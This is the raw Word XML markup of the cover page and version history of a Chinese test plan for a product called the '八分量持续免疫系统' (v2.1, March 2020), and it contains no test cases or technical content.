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8BA45" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF">
      <w:bookmarkStart w:id="0" w:name="_Hlk35882625"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2B3EE4C6" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="26DB5593" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="476EB37B" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="7CE84FAB" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="77455917" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="3A77BEDE" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="1EE219B3" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="6300B3B4" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="2CFAEBC4" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="31337CD8" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="1F493E9E" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="57F3E633" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="42D31236" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="366E79BC" w14:textId="737A7364" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="3BA9B8AB" w14:textId="791E3CFA" w:rsidR="0018710C" w:rsidRDefault="0018710C"/>
    <w:p w14:paraId="18164041" w14:textId="77777777" w:rsidR="0018710C" w:rsidRDefault="0018710C"/>
    <w:p w14:paraId="4740EC26" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="20B05941" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="0CDFD2BC" w14:textId="6B7EAB14" w:rsidR="00CD0BDF" w:rsidRDefault="00A5661A" w:rsidP="00A5661A">
      <w:pPr>
        <w:pStyle w:val="8lab-d"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>八分量</w:t>
      </w:r>
      <w:r w:rsidR="00895A44">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>持续免疫系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75760763" w14:textId="31971A9B" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00A5661A">
      <w:pPr>
        <w:pStyle w:val="8lab-d"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>测试方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B537716" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRPr="0018710C" w:rsidRDefault="00A5661A" w:rsidP="00A5661A">
      <w:pPr>
        <w:pStyle w:val="8lab-d"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A4297A" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="11D7E31F" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="2230DFC7" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="48058728" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="171EF206" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="19377BF1" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="009A8307" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="42A1590B" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="42E1C8FF" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="6AE8C74F" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="7F331862" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="663B5D03" w14:textId="5597FD0C" w:rsidR="00CD0BDF" w:rsidRPr="00F52796" w:rsidRDefault="00F52796" w:rsidP="00F52796">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F52796">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>版本编号：v</w:t>
      </w:r>
      <w:r w:rsidR="00A5661A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E63162">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A5661A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB7B81B" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="391E9E67" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="66AFB0E7" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="2DC5591C" w14:textId="77777777" w:rsidR="00CD0BDF" w:rsidRDefault="00CD0BDF"/>
    <w:p w14:paraId="06F8533A" w14:textId="128D3B2B" w:rsidR="00CD0BDF" w:rsidRDefault="00A912E4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk36221058"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00E63162">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>年0</w:t>
      </w:r>
      <w:r w:rsidR="00E63162">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidR="00F5725D">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="7D7D50A5" w14:textId="28F2E7BD" w:rsidR="00A1088D" w:rsidRDefault="00A1088D" w:rsidP="00A1088D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68053616" w14:textId="26D938E5" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00A1088D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Hlk36221074"/>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>版本记录</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="1f5"/>
        <w:tblW w:w="9173" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1349"/>
        <w:gridCol w:w="1535"/>
        <w:gridCol w:w="1583"/>
        <w:gridCol w:w="4706"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F422B4" w14:paraId="45DBE007" w14:textId="77777777" w:rsidTr="003826BC">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49" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="288B50E3" w14:textId="77777777" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00845D1D">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="4" w:name="OLE_LINK3"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03AADB6D" w14:textId="77777777" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00845D1D">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1583" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CB09899" w14:textId="77777777" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00845D1D">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>作者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4706" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DDB01AC" w14:textId="77777777" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00845D1D">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>修订说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A5661A" w14:paraId="45483E6D" w14:textId="77777777" w:rsidTr="003826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49" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F2E3D65" w14:textId="0AF2B9CC" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>V2</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BF5FECB" w14:textId="372ACAB6" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00A5661A">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r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>-02-</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1583" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="373C86F1" w14:textId="7FAF6B40" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00A5661A">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c>
          <w:tcPr>
            <w:tcW w:w="4706" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2811932F" w14:textId="63072270" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00A5661A">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r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>修改测试方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A5661A" w14:paraId="2275735F" w14:textId="77777777" w:rsidTr="003826BC">
        <w:trPr>
          <w:trHeight w:val="549"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F8FB8F4" w14:textId="23C11FD2" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>V2</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47B77548" w14:textId="42EE7BCD" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00A5661A">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r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>-0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1583" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="641B22BF" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00A5661A">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4706" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0010E031" w14:textId="5210505F" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00A5661A">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r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>增加测试用例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F422B4" w14:paraId="537FA889" w14:textId="77777777" w:rsidTr="003826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49" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ED7C681" w14:textId="77777777" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00845D1D">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06E6EC74"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c>
          <w:tcPr>
            <w:tcW w:w="1583" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6409CA59"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c>
          <w:tcPr>
            <w:tcW w:w="4706" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66A4989D"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r>
      <w:tr w:rsidR="00F422B4" w14:paraId="427D9BD3" w14:textId="77777777" w:rsidTr="003826BC">
        <w:trPr>
          <w:trHeight w:val="549"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63716004" w14:textId="77777777" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00845D1D">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F7D67E7"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1583" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5907B25A"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4706" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="175211B2"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r>
      <w:tr w:rsidR="00F422B4" w14:paraId="200148FF" w14:textId="77777777" w:rsidTr="003826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49" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67CFD666" w14:textId="77777777" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00845D1D">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B6104B6"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c>
          <w:tcPr>
            <w:tcW w:w="1583" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43FE850C"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c>
          <w:tcPr>
            <w:tcW w:w="4706" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1642E96A" w14:textId="77777777" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00845D1D">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F422B4" w14:paraId="5BCB7FCE" w14:textId="77777777" w:rsidTr="003826BC">
        <w:trPr>
          <w:trHeight w:val="549"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C5A2F08" w14:textId="77777777" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00845D1D">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ACB4249"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1583" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42BAD871"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c>
          <w:tcPr>
            <w:tcW w:w="4706" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="150E2C70" w14:textId="77777777" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00845D1D">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:tbl>
    <w:p w14:paraId="1C7AF174" w14:textId="13F2BB72" w:rsidR="00A1088D" w:rsidRPr="00C2216B" w:rsidRDefault="00A1088D" w:rsidP="00A1088D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="00A1088D" w:rsidRPr="00C2216B">
          <w:headerReference w:type="even" r:id="rId9"/>
          <w:headerReference w:type="default" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:headerReference w:type="first" r:id="rId12"/>
          <w:pgSz w:w="12240" w:h="15840"/>
